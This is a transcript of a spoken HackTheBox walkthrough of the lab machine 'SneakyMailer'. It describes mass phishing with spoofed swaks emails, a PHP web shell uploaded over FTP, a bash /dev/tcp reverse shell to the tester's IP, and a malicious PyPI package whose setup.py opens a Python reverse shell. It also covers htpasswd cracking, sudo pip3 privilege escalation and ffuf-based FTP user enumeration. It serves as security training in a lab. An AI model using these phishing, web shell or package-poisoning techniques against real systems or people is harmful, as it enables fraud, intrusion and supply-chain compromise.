What's going on YouTube? This is IPSec. I'm doing SneakyMailer from HackTheBox, which was a really fun box that involved scraping a bunch of emails off a website and then sending phishing emails to all of them, hoping that one clicks the link and sends some data. The only thing I really didn't like about this box was you didn't have to create a good phishing page. It looked like the box was intended for you to have to make a fake registration page, and then the user would only submit registration data to that page. However, that's not needed. You can just stand up netcat and they go right away to send you the post request. It'll make much more sense once we get into the video. And at the end of the video, I'm going to do something a little bit extra and show you how I'd create a quick application to do a light fuzzing on a protocol you may not be familiar with. So with that being said, let's jump in. As always, I'm going to begin with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, putting the directory nmap, and we'll call it SneakyMailer, and then the IP address, which is 10.10.10.197. I'm also going to run nmap with sudo because I'm not the root user, and since this command does take some time to run, I've already ran it, so let's just take a look at the results, and we have quite a few ports open. First thing I notice is VSFTPD is running on port 21, and because nmap doesn't tell us anonymous login is open, chances are there is no anonymous login. However, it's one of those things I always just like to double check because it takes like 5 seconds. So just logging in with anonymous, and we get, right away we got login failed. So nothing happens there. So we'll just close that out and keep on going. We do have SSH on port 22, and it's a Debian box. We have SMTP on port 25, and that's running postfix. And looking at these, I don't see anything like a host name. We do get confirmation this is Debian. Nginx running on port 80. So I'm going to guess this probably isn't PHP just because I generally don't see PHP on Nginx. Doesn't mean it's not possible. It just means it's not exactly common. And we see it's giving us a redirect to SneakyCorp.htb. So I'm going to go ahead and make sure this is in my host file. So let's copy this, sudo vi etc host, and then we'll add a 10.10.10.197 to this box. And all that's going to do is if I try to ping SneakyCorp.htb, I can't do it. And now I will be able to now. There we go. So since I rewrote the DNS entry for my local box, when this web server does point us to go to this directory or this domain, our box will know where to go. We also have IMAP on port 143, and common name is localhost in this SSL cert, so we're not really getting anything there. This is IMAP over SSL, and port 8080 is running Nginx as well. And this one is giving us the Welcome to Nginx banner. So let's start off by just going over to the page. So going to 10.10.10.197, and we'll get redirected to SneakyCorp.htb, and it looks like we have a web page. So I'm also going to go to 10.10.10.197 and port 8080, and we get Welcome to Nginx. So before we get too far in, let's just start a GoBuster. We should find out exactly what language this page is, if it's Python, PHP, or whatever. And it looks like we do have Nginx running on PHP. We can try like index.php here. We don't have anything. When I do GoBuster, I'm not going to specify the index or extension as PHP here because we just don't know what the extension is. It'd be weird to have two different Nginx things on one box, both pointed to PHP. So that's why I'm not going to do that. Because chances are they would just use this Nginx process and put it under a different virtual host. So let's go and run a GoBusters. So GoBuster dir mode -u http 10.10.10.197 port 8080 -w for word list user share word list. Actually, I'm using seclist now. So opt, seclist, and then discovery, web content, and I think we do raft small words first. That's generally one that's been my go-to lately. And we can do the same exact thing, except next time we are going to change it for SneakyCorp.htb for this URL. Okay, so the Durbuster has been started. Let's just go poke at this. So right away we have the notifications in this right. It says welcome to Sneaky Corp, and then we got some messages, and I can't click on these messages, but we have names. So Brady, Greer, Kara Stevens, and it's telling us talk with Brady. Let's see if we, I don't know how to view the rest of this message. It says, hey, my name is Brady, ... Trying to get like the tooltip to show by leaving my mouse cursor over it. It's not working. Clicking on the profile picture, we can only log out. There is this project update thing. The project teams has been formed and work allocated. Please check your email for further instructions and register an account. So chances are, I'm thinking this is going to be phishing or something, because this is one of the few boxes that have web servers stood up. And then we have this pypi. It is now possible to install modules with pip on our server. And looking at this, there is a create an account page. And it's called registration.png. I don't see any type of register. I'm going to log out. And when we log out, nothing happens. So chances are this is, I guess, just coded so we're always logged in. There's no login function. But I am going to try login.php and go back to my GoBuster because I forgot -x PHP on this one to append .php to all the words it is finding. So it would tell me if login or register or something .php exists on the server. I am going to click on this link, the team, and we get a list of emails, it looks like. So let's just go and change this to 100. Looks like we can grab everything on one copy. So I'm just going to copy this entire thing. And then we will go and create it. That is team.php, GoBuster just found, and that is what we're on. So nothing is there. If you just looked here, I was noticed that. So let's create emails, or let's do team.text and copy this, paste, Control-Shift insert, there we go. And it looks like this is tab delimited. I think that's what this blue thing is. All these blue dollar signs are just saying end of line. I think this is tab. So I'm going to save this, and we'll awk-f for field separator, \t for tab, team.text, and we'll print, I think 4. I think it was like name, position, office, email. So if the delimiter is tab, we'll only see emails here. That does not look like it like that. I'm going to put team.text at the end of this. There we go. So that delimiter was tab, and now we only have emails. So I'm going to do this, direct it to emails.text. If we cat emails.text, less it, we have a list of emails. So now let's try to send mail via SMTP. And I'm going to use a tool called SWAKS for this. We could do like Telnet, but this is Swiss Army Knife SMTP, which just is going to make this so much easier. We can see it has a bunch of arguments. If it is authenticated, there is a method for auth, but we're going to try to do it unauthenticated. So I'm going to do v, we'll call this fish.sh. We're just going to do a bash script. And I'll do for I in cat emails.text. And then do, and we'll say SWAKS. And I think I can do multiple lines like that. We could put all these arguments on one line, but it's probably going to be easier to read if I just do a different argument on each line. So the from email, I'm going to do support at SneakyMailer.htb. And the great thing is, if the SMTP server is just open, which you'll generally find it is on internal networks, you can just say the from address as anything you want. So to, this is going to be I. We could do email to make it a bit easier to read. So for email and that. And then we probably need to do that. Header, this is going to be the subject we want. So subject, please register your account. And I chose that because if we go to the dashboard, we just have this project update of the website asking people to register. So let's do another backslash. Body, we're going to give them a link to register. I'm going to give them HTTP 10.10.14.2/register.php. That doesn't exist on the server, but it still looks legitimate. And then the server is going to be 10.10.10.197. That is the server of SneakyMailer. So I can do done. And if I typed all that correctly, it should work. Keyword being a major if I type that correctly. So NC LVNP, I'm going to do the K, and the K is going to keep it open after a connection, I think. LV man NC, keep -K is keep open. LVN KP, there we go. So what that did, if I do NC localhost 80 test, NC localhost test, we can see netcat stays open. If I get rid of this the K, and we do this, and close this, it closes netcat afterwards. And I don't know how many users I'm going to get to come to me, so that's why I'm doing the K option. So we're going to do fish.sh and see if they click this link. Service or name not known, -- server, line 8. Let's try the host name. So SneakyCorp.htb. And this from can probably be SneakyCorp.htb as well. -- server command not found. Oh, I don't have a backslash here. There we go. There we go. It's connected. And we'll see it start sending a bunch of telnet, I hope. So let's give it some time. And you can see all the commands it typed. So when it has this arrow away, this is the command it ran. So it ran a extended hello with my host name. And then the server responded with a bunch of information, what the server is allowed to do. And I said, okay, I want to send mail from this address. The server goes, okay. And then I want to say, I want to go to this address. The server says, okay. And then I begin the data stream. And the server's telling me, okay, end with a carriage return and a line break, I believe. Just two of them. Carriage return, line break, period, carriage return, line feed. I think it's line break. I don't know. Line feed is what that stands for. But it wants it to end with a period and new line. So we say, okay, here's the date the email should be. Here's the address in the header, the from in the header, the subject of this, the message ID, the mail agent I'm using, and then here's the content of the email I want to send. And then we send the period, which signifies this is going to be the end of the email. And the server says, okay, we have queued the email, and we're like, okay, close our connection. I'm going to do that for each of these accounts, and it can take a little while, so I'm just going to let this run as it sends a phishing email to every account to see if anyone clicks it. And chances are we're just going to get like a user agent or something back here, and from there we can try to figure out what we want to do. This is just making sure someone clicks, because I don't want to go and create a whole phishing page if I don't see a user clicking to begin with, because that would just be a lot of waste of time. So let's check back at our GoBuster. Nothing there. This one is still running, and we don't have anything interesting here either. So I'm just going to exit this, and then we will just wait. And eventually we actually got a hit back, and the user just sent a bunch of information. So this was a probably slightly poorly coded script in order to simulate a phishing attack. To do it a bit better, I probably recommend like checking the page and then forcing a login form or something. But we'll go over that at the end of the video most likely, since generally you can't just stand up a netcat session and get a post request back. I'm starting up Burp Suite just so I can decode this request. I forgot to do it before, and I probably should update my Burp Suite, but oh well, we'll do that later. So going over to the coder, I'm just going to paste this and we can get everything. So first name, Paul. Last name is Bird. His email is password, and he confirmed his password. So let's go and see what we can do. There was a FTP site. So let's try logging in with FTP. So FTP 10.10.10, 197, put the username, and we'll right away denied. Sweet. So we have a way to enumerate valid users. I don't know of a tool to do it. I'm sure there is. Let's see. FTP. I bet Metasploit has something. So msf db run must be run as root. Okay. So I'm just going to check the enum scripts for Metasploit because we may be able to enumerate potential usernames. Let's do FTP 10.10.10.197. Root exists on the box, I know, and permission denied. Another user that probably exists on the box is bin, permission denied. If we try doesn't exist, permission denied. So there's got to be some hard-coded user that works. I'm just going to run search FTP. And let's go through auxiliary modules. So I'm looking for like a enum option. So I'm just going to put my cursor to the top and then type /enum to see if we have anything. This is auxiliary scanner SSH. So that's SFTP. I just want FTP, and we don't have anything. So maybe I can just Google enumerate valid FTP users to see if we have anything. Brute force FTP credentials. FTP User Enumeration. So we got this nmap script. And let's see. Oh, this isn't nmap. This is just Perl. Why did I think that was nmap? Let's just try this real quick. wget vft Perl. I can't remember the last time I've run a Perl command. Vim. How do we use this? What? That's annoying. We have to go and go raw, and then we can download this. wget that mv.1, and then Perl, this command. There we go. So check if a user exists. -u. Let's see. -t host 10.10.10. 197. Let's see, file of host names. Capital U is a file. So opt. Let's do seclist, and then discovery. Where is users? Opt seclist usernames, and we can try. Top username shortlist. So we're doing the scan. While this goes, we can try something else. I'm going to see if I have any mail clients. I don't. So we're going to log in via email with this credential. So sudo, we'll do apt install Thunderbird. Yes. And we have some valid users. So admin, root, test, guest, info. I don't know if this is accurate. Is it just saying every user? Let's see. Copy. I literally think that's saying every user. Let's see, is Ansible here? It is. So maybe this is not a good script. 17 results. And this file is 17 names. So yeah, not a good thing to do. Thunderbird is installed, so we can run it. And if you know in the comments, leave a comment of a good FTP enumeration tool, and we'll add it in the next time we have to do something like this. We can copy that password. Name, I'm just going to do Paul. We'll paste the password, and we'll put his email. Here we go. SneakyMailer.htb. I'm going to make sure that host resolves in my host file. So v-etc host, SneakyCorp, SneakyMailer.htb. Continue. And let's see if this is going to authenticate. Let's try and common server names. And it looks like it found things. We got IMAP and SMTP. Username, Paul Bird. And, oh, it failed to find settings. Let's see. Retest. Server hostname. I'm going to get rid of that beginning dot. Just try SneakyMailer.htb. Retest. And I'm going to make sure we didn't typo when we added this. Or maybe I didn't save. We now resolve. And it looks like it failed to find the settings. I'm not sure exactly what is going on here. Let's see. I'm going to start up Wireshark. And we're going to see if it actually makes a connection. So let's go to ton 0. I don't have permission on that device. Sudo Wireshark. There we go. Let's do ton 0. And retest. Let's follow the stream. See capability, logout. It's not sending any credentials. 2, 3. Let's do search. IMAP. I wonder, maybe it doesn't support logging in. Let's say SSL. Try this option. We may want to do 443. Fail to find settings for email account. Cancel. Let's see. I'm going to try a different mail client, I think. So let's do sudo apt install evolution. Not sure exactly what's going on with Thunderbird. Honestly, I only use Outlook for mail clients, so I don't know all the configurations. Come on. So evolution is installed. Let's try this now. So launching evolution, and I hit Alt F2 to bring up that prompt, if you're wondering. So let's see, identity, Paul BYRD, Paul BYRD, reply to, maybe Paul BYRD at SneakyMailer.htb, SneakyMailer, add Paul BYRD. Oh, it wants an email address here. Paste. Okay, so for the server, SneakyMailer.htb, username Paul BYRD. Click next. Sure. SneakyMailer.htb. Click next. Paul BYRD at SneakyMailer. Okay, Accept the certificate, and let's get his password. So paste this in. Wants password for my keyring. Let's see, Paul BYOD. Paste this. Okay, did we log in? Let's go to inbox. No messages. I should have checked that no option and read that error message. Let's restart evolution. Evolution. Let's see. Don't add to keyring. Paste. File system initialization. File system initialization error. Contact your mail administrator. Oh, in the sent mail, there are two things. So I don't know exactly what that error is, but we do have module testing and hello low. Your current task is to install, test, and erase every module you find in the pypi service. Let me know if you have any inconvenience. And then we also have password reset. Hello administrator, I want to change this password for the developer account, username developer, and we have this long password. So let's go and try to SSH. SSH developer at 10.10.10.197. Paste the password. And nothing happens. We can try FTP 10.10.10.197 developer. And see, now it's actually asking for the password. That's the thing we could use to enumerate users. Because if we try FTP 10.10.10.197 and we have a username that doesn't work, it just says permission denied. So we should be able to brute force valid users of this FTP just based upon it giving a password prompt. We do a dir. There is dev. Let's go into dev. And we have a few files. Team and index.php. So I can download, I think it's get on FTP. What I'm going to do, make sure this is still in, make dir FTP, go into this directory. And I probably could have run, I think it's like LCD for local CD to change the directory into FTP, but I just always like exiting FTP and redoing it. So let's download this. wget-r developer : this. I want to say it's like FTP : / that at 10.10.10.197. Will this work? Let's put this in single quotes. Stupid bad characters. Unable to resolve hostname NAH. Oh. Can we escape this? I may just manually download it. Normally, like, user password is separated by an @ sign, but this password has an @ in it. So I'm having trouble figuring out the correct way to escape this. Let's see, man, wget user. Is there an option for user -- user -- password? So we can try that. So FTP -- user developer developer. There we go. -- password. Try this. Put it in single quotes. Maybe -- user equals. Maybe get rid of the equals here. Maybe don't make a typo when I type password. There we go. So now we're doing a recursive download of this FTP server to download all the things. That comes in super handy because now we can easily just go and look at the PHP source code. So if I do team.php, we can quickly look at it. If I did vim, we have it in syntax highlighting, and we could search for like bracket that, which would be the PHP tag, and there's no dynamic content on team.php. I can do v on index, and we can kind of do the same thing, no dynamic content there. What I'm going to do is I'm just going to put that in real quick to make sure it would actually find it. Because those are two special characters, I want to make sure I wouldn't have to escape them or anything, and I don't. So whenever playing with things, it's always best to test it out to make sure you have like a control and something that you know what you're doing would work if it was correct. There is this pypi directory and there's a Register.php, but again, there's no actual PHP. So the server uses the PHP extension, but it could just be HTML files because there's no dynamic content. We can try 10.10.197/pypi/register.php and pypi/register.php. And we get this create account thing, but again, nothing happens when we do this. We could just download this page and then host it locally. So in a phishing email, it's a bit more believable that someone would type all this information, but we didn't have to do that. So let's see. The next thing we should do is see if we can just upload files to this FTP directory. So let's do FTP 10.10.10.197 developer, and we'll copy this password. And do a dir, go into dev. Let's see, cd FTP, echo please subscribe to test. And we'll try a put on test. And we can actually upload that file. So let's see if we can find it on the server. So let's go to SneakyCorp.htb/test. Nothing there. We could try port 8080. That was a different web server. It's not there. There is a /dev. Is that a directory? It does not look like it. We could guess that a lot of websites use subdomains. So I can do sudo vi etc host, and we can put the subdomain of dev.sneakycorp.htb and see if that is it. So let's try dev.that / and we get a page. So let's try test and not found. Let's see. Let's go back to FTP dir. It's not there anymore. Let's put test /test, and it's asking us to download the file. So it is there. There's just a cron that is deleting files in this FTP server. But we can put a PHP shell and just get code execution. So let's v shell.php, and I'm going to do PHP system request please subscribe, like that. And we'll put shell.php. If I do shell.php here, please subscribe equals ID, we can run commands. So let's send this over to Burp Suite and do a reverse shell. The reason why I like sending this to Burp Suite now is because we want to make this a post request, because there's less bad characters in a post request. So it's just easier to write. So --c, --i, like that, dev tcp 10.10.14.2, port 9001, 0 and 1. This is just a reverse shell one-liner. When you type it enough, you memorize it pretty quickly. So let's go over to a new thing. I'm going to just go back to the pane, and I'm going to make dir log script shell.log. And that's just there, so it's automatically logging everything I do in this terminal pane. So let's go back to Burp Suite, send this to repeater, run it. We get 404, so let's upload this file again, put shell.php, run it, go back to this, and we have a low priv shell on this box. So I'm going to do python-c, import pty, pty.spawn, bin bash, control Z, stty raw minus echo, fg, enter, twice hit enter, and now you'll have tab autocomplete and everything, which is nice. And I'm going to control L to clear the screen. I can't, so export term is equal to x term, and now I can clear the screen. So the first thing we should do is look at the home directory. Is there like flag.txt? There isn't. If I do ls/home, there is a user called low. So if I do ls/home low, there is user.txt, and can we get to it? We can't, so we have to escalate to this low user. The first thing I'm going to do is a ps-ef grep for low to see what low is doing. And we can see the user low is running /home low virtual env bin python app scripts low install modules.py. So let's see if we can go into this directory, op scripts low, and we can't. I'm going to try cat low install modules.py, and we still can't do it. There is a developer, cd developer, permission denied, vmail. This is probably the SMTP stuff, so we can't really get anything. Going to go to my home directory, and we have a dev.sneaky, a HTML, a pypi, and a SneakyCorp. So I'm going to do cd HTML, and that's just the default thing. So this looks like what port 8080 was at. Still don't know exactly what port 8080 is for. There is the pypi. So let's go into pypi. There's packages and virtual environment. I'm going to do find-type f to list all the files. We have a HTPASSWD file. I guess we can grab this and then we'll try cracking it. So let's copy this and then SSH to the Kraken. This is just a box I have in my house because you should never crack things in a VM. And additionally, I don't want to crack things on my host computer because that's where I record from. So I always like going to a different box to crack. So I'm going to go cd hashes. I'm going to vi pypi. It's so hard not to say pypiper when I keep saying this name. But let's do hashcat -- example hashes. I'm going to do less. / and do HTPASSWD. Let's see, APR1. I'm going to search for next, and we have the hash format. Hit up a few times. Mode 1600. So I can do / hashcat -m 1600 hashes pypi, and then the word list, which is opt word list rockq. While that runs, we can add pypi to our host and token length exception. So we have the username inside of the file. It was user : hash. I'm going to add the -- user flag, so hashcat will just ignore the username. And now it is cracking. It looks like it's already done. We can look at this. I'm just going to do get rid of the word list -- shell, and we get this password. I have no clue what that word is, but we got a password. So let's take a look at this pypi domain. So sudo vi etsy cron. I don't know why I did cron tab. Etsy host. And we want to do pypi.sneakycorp.htb. And let's see. Just going to copy this. Echo that to cred, just in case we need it. And we can go over to a browser, pypi.sneakycorp.htb. I'm going to take burp suite off. And we don't get anything. pypi.sneakycorp.htb port 8080. And here we go. So this is what port 8080 is. It's a Nginx server, and this is pypi. I'm gonna go and see cd etc Nginx sites available, and we could pull it this way by looking at the Nginx config. We see the server listens on port 8080. The server name is pypi.sneakycorp.htb, and it's piping it to localhost port 5000. So that's another way we could have done that. So let's go and create a malicious pypi package and see if we can upload it here. The first step with that is figuring out how to create a pypi package. So I'm going to Google malicious pypi package, and it looks like we're going to get to a bunch of news articles where this has actually happened. So I'm guessing we're redoing what these attackers did. Let's just, instead of Googling malicious pypi package, let's just create Google how to create pypi package. And let's see, packaging Python projects. So it looks like we need a directory, a name, and a init.py. So let's go here, and I'm going to make dir pypi, and we're going to make the package name. I'm going to call it please subscribe. And this is going to be v init.py. And that's just a blank file. And all that does is, if we do Python 3 now, and we say import please subscribe, we can import that module. If the, whoops, cd please subscribe, if this init.py wasn't there, so let's just do, sure, that. So there's no init.py here. I'm just going to clear this cache as well. And we do the same thing. So let's go Python 3, import please subscribe. Oh, it still works. When you import the directory name, the init.py would get executed. So that's what that's doing. So let's init.py print hello world. So we can do that. This should work. Python 3, import please subscribe, and we can see it executes that init.py. So that's what that is exactly for. I'm going to clear that so it's not doing anything. We just, I think, need that file to be created. And then we got a setup.py, and setup.py looks like this. So let's do this. vi setup.py, paste, and we're going to do our malicious thing here. So we could potentially drop an SSH key or something, but I'm just going to do a reverse shell. So Python reverse shell, and we're going to go to pen test monkey and copy this, paste, and let's just make this a shell. So whoops. Import socket subprocess OS. S is equal to socket. Yep. Let's do 10.10.14.2 port 9001. And then we can get rid of all these, put them on lines like that. And I'm guessing we're missing, oh, there we go. Since everything was purple here, I knew there was a quote that wasn't closed, and it was right there. So we can delete that, and now when this module is loaded, it should run this command. So we can test this reverse shell and see lvnp 9001, Python 3 setup.py. we get a connection from a box, so we know that works. So the next step is to have our Python point to the server. So to do that, we have to create a pypi.rc file, which will be in our home directory. So .py, am I spelling that correct? I think it's pypi. Let's go to this. What is it? pypi. Yep, pypi.rc. And then we have to say dist utils, the index server is equal to remote, and then configure remote. So repository http pypi.sneakycorp.htb port 8080. Username is going to be pypi, and we do a colon, and password is equal to, let's cat the cred and grab this. Paste. And I think that is it. If not, we'll have to Google exactly pypi and figure it out. So we can do Python 3, the name, sdist is going to tell it we want to make it a like egg file, which is like a Python plugin. Then we want to upload it to the remote site. The very first shell we get back is our IP address 10.10.14.2. So I'm going to start another netcat session and close it because it actually executes this Python script. And then it should have uploaded it. Long description not defined. Let's see. Long description. Oh, this doesn't have quotes. I'm just going to delete that line. Sure. Wonder if I need to get rid of that Python 3 thing. It was Python 3.6 that was required. Index servers, no option. Index servers in section. V pypi.rc. Maybe it's index servers. Let's try this again. Submitting, and we get a shell back from 10.10.10.197. If we do ID, it is going to be the user low. And again, the reason why we thought that is if we do ps-ef grep on low, the user was running a Python script called install modules. So here I'm going to do lsla. We can go in home low, and we can, I guess, drop an SSH key to get a more stable shell. Python, we could do Python TTY trick as well, but I'm just going to drop an SSH key here. So SSH, let's do SSH-keygen -f for file, and I'm going to call this low. Cat low.pub, and we're going to grab this and echo with 2 carets, so we append it to the authorized key file. And if we cat authorized key, we can see our key. It begins with a bunch of A's, ends with goo, bunch of A's, and ends with goo. So now we can do chmod 600 on low, sh-i low, low at 10.10.10.197. And it did not work. Why did that not work? LSLA? Authorize, move authorized key to authorized keys. Typos get you every time. There we go. So now we have an actual SSH connection, which I think is just a bit more stable and also a lot easier to get into if we ever screw things up. So let's just close that. And we can also see if we go to log, we have shell.log. And this is the contents of everything we did in that reverse shell. For your notes, So let's see, we can do sudo-l. And it's taking a while once we run this command, and that tells me that the etc host file has the wrong name here. Sudo is going to do a DNS reverse lookup every time you run it, and when it can't find the host name as 127.0.0.1, it's going to take a while. So I'm going to cat etc host, and we can see the box's name is SneakyCorp, but we have SneakyMailer here. So every time we run sudo, it's trying to figure out who SneakyMailer is, never gets a response, and then once it times out, it runs this. But we have low is able to run pip3 as a root. So let's do GTFO bins to see if there's anything bad we can do with pip3. So I'm going to type pip. So pip3 came with nothing, but pip did. And there is a sudo. So I'm going to click sudo. And it looks like I'm going to probably copy these first two lines. I'm not copying the last one because this is just pip. I'm going to specify pip3 manually. Let's go to cd/temp to run this. And then I'm going to copy this line, but go back and type pip3. And it's going to take, again, probably 30 seconds for that DNS request to time out. And once it does, we'll have hopefully a root shell. There we go. It looks like we have a shell. If we do ID, we are root. So we can grab root.txt if we wanted to. Let's do Python. If I do sudo-l here, is it still going to take time? It is. I should have done something to fix that. I guess we'll just wait. Wait this one out, and then I will upgrade my shell, probably just dropping the SSH key again. And we will edit that host file so you can see sudo indeed is much quicker when the correct host name is in the file. So let's do python 3-c, import pty spawn, bin bash, control Z. Oh, control Z isn't working. I wonder if I just can't control Z because I'm in an SSH connection. Looks like it's working. So let's do vi etc host, see how this works. Looks like it's doing fine. I'm going to add SneakyCorp.htb, sudo-l, and it's still not instant. I wonder if that's because there was multiple entries. And that is like hung now. sh-i. That was not it. Let's see. SneakyMailer failure to return DNS. Hostname. Oh, the etc host. It's probably just SneakyMailer, SneakyMailer.htb, ping, SneakyMailer, getting a response, sudo-l, and instantly returns. So as soon as we have the hostname correct, it works perfectly. So apologies for the sloppy cut. When I was rewatching the video, I decided I wanted to just expand upon that FTP enumeration piece at the beginning. I'm not going to hunt for a tool and find the tool to do it for us because honestly, where's the learning in that? Instead, I'm going to show how I'd approach this problem if I was confident there wasn't a tool out there to do it. And the very first step is to make the problem more familiar to me. So I don't know the FTP protocol all that well, so I'm just going to convert it into HTTP. And you can see plenty of other people do things like this. Like I remember Tavis Ormandy from Google Project Zero. When he was fuzzing Defender, he actually created a program to port Defender to Linux so he could use his Linux tools and fuzz it. So this is kind of what we're going to be doing with the FTP. We're going to move FTP to HTTP and then use FFUF against it. So in order to do that, I just need to create a PHP script. And what we're going to do is probably echo something into Telnet. So let's try echo ipsec and then FTP 10.10.10 197. and see what happens. Hopefully it just goes to login failed. Now, since we're Nostradamus, if we know that, we can just go like developer, and this output is different. So because this is different output, we can identify quickly when this happens, at least over HTTP. So that's what the theory behind this is going to be. So let's put PHP here, and then we're just going to use the trusty system command and say echo, then we'll do request name, and then actually we have to concatenate these two strings with the period. And we can pipe this over to FTP 10.10.10.197. And close the system. And that's probably going to be all she wrote. So let's do PHP-S 127.0.0.1.80. We have to run that with sudo. And now if I curl localhost /name equals ipsec, let's see what we get. Login failed. We can see the permission denied message right here. If we do developer, let's see. Doesn't look like we're getting anything back. It's probably hung up on this because the socket didn't close. So if I hit enter there, will we get something back? We do. We got nothing. So we can go back into our script and put a timeout in here. Let's see. Let's go over to Google, PHP set timeout, set time limit. So set time limit. Sweet, it went green. Let's just go for 2 seconds. So now our script should fail after 2 seconds if we're lucky. Okay, 1 Mississippi, 2 Mississippi, 3. The script is still running, and I think it's blocking. Since this PHP app is not multi-threaded, we can't run multiple at the same time. So that's not working. So it looks like the timeout does not work with the system command, or we're using it wrong. So let's go back here, and let's see. In Bash, there is a timeout command. So we can probably just do timeout to there. So if we do like sleep 5, 1, 2, 3, 4, 5, it should come back now. If we did timeout 2, we can actually kill this command after 2 seconds. So 1, 2, and we get it back. So we can do that same thing with that PHP. So now when I curl developer, 1, 2, and it comes back. So what this allows us to do now is we can use FFUF. So we can do FFUF-W for word list, opt, sec list, usernames. We can test with, let's just do top 10. And then -u for URL, HTTP, localhost, and then name is equal to fuzz. And it should go through each one and output the size. Developer is not on this list, so it's not going to do anything. We could cheat if I can close FFUF, or let's see. One of these should die. There we go. So let's just cheat real quick. So vi and go to, where's the sec list? Sudo vi opt sec list discovery. Actually, instead of doing that, let's just do please subscribe, and we'll say this user does exist, and the user was developer. We can do some after it as well. Thanks for the sub. So now when we run this with this word list, we should be very obvious. Did I get the file name wrong? It should be very obvious which is the valid username. So maybe I should do the full path. pwd/. What is going on there? echo this cat. Oh, I stopped the web server. There we go. So we can see each request and the size is 48. And once we get to developer, the size becomes 1. So, yeah, I was wondering why it stopped outputting, but it was just a bug there. So, showed everything. We can do FFUF-H, and I think this is match, it says. Let's see, filter match. So if we want to match or filter out the size, so we can say FS to filter size, and say we don't want anything with a size of 48. So let's do -FS 48. And hopefully it hides everything. So while that goes, we can try to make this threaded. And by making it threaded, all we have to do is move it over to like Apache, because that's what the web server does. So that's one of the reasons why whenever you do like Python simple HTTP server or something, you should put a WSGI in front of it. I think that's web server gateway interface or something, because that's going to handle executing the script and making it threaded. But in PHP, we can just run Apache and it's super simple. At least I really hope it's going to be, or this is going to be an awkward segment of the video. But var www HTML, and I already have some stuff in there. We can do sudo move, and then if we go to cd etc apache 2, we can look at mods available, ls grep-i php, php 7.3 is available. So we can do mods enabled, lsla grep php, and I see PHP is enabled. If it wasn't enabled, I think it's just a2 en and whatever mod. So we can do sudo a2 dismod php 7.3. What is it? lsla grep, no dash. So if we do sudo restart apache 2, service, let's just do systemctl. Systemctl failed. Probably because, are we listing on port 80? Nope. Sudo journal ctl-xe. Let's see, Apache 2, exit, cd var log Apache 2. Let's just go sudo su var log Apache 2 tail error.log. Nothing there. sslntp grep 80. 8080 is listening. 443. Systemctl stop Apache 2. And we'll start it. What is going on, Apache? That's not supposed to happen. Search engine X status. That's not loaded. Etsy, Apache 2, conf-enabled, sites-enabled. What is that? I'm not sure what I did to do that. Is that default in parent? ls opt x plico? Probably installed some package that did that. RM098. And now it starts. Okay. I'm not sure where that package came from. Wonder if I can just Google this package name and see. Guessing it's something I installed. Yeah, not sure, but Apache's running now. So if I do localhost, we get that. If I go to index.php, it's going to print out the script. It didn't show it in this because it's inside of brackets, but it's not executing because we don't have the Apache 2 module loaded. So if I go back to the A2EN mod to enable the mod PHP 7.3, and then we restart Apache again, when I refresh the script, it's going to error out because it's going to say like request name is used but not given. It's thinking permission denied. So it looks like the name, I don't know. I thought it would error, but name equals test, and we get the error message. Sweet. So if we go to developer, it's probably going to time out and give us nothing. There we go. So now let's run FFUF and see if it goes any faster, because now we're going to Apache and not our PHP. So Apache should be, yep, threat. What? What is that size? Cat, please subscribe. Yep. Oh, index.php, because this is going to index.html, because that file exists in Apache. So, yep, much faster. Oddly enough, the size is 50 now, not 48. So let's filter size with 50, and you can see how much quicker that is. If we don't, it comes back nearly instantly. Again, let's stop Apache and then we'll run it again so you can see the difference between it being threaded and not, and then that will be the video. So let's just go here, sudo php-s, that, run it, and I guess I got to copy the file back. Sudo cp var www html index.php. And again, if I run the PHP web server, you can see it's definitely one at a time this way. So a little bit of things I would do if I was approaching this challenge with no knowledge of the protocol. Always convert to something you know, and then use the tools you know against it. So hope you guys enjoyed the video and this little extra segment. Take care, and I'll see you all next week.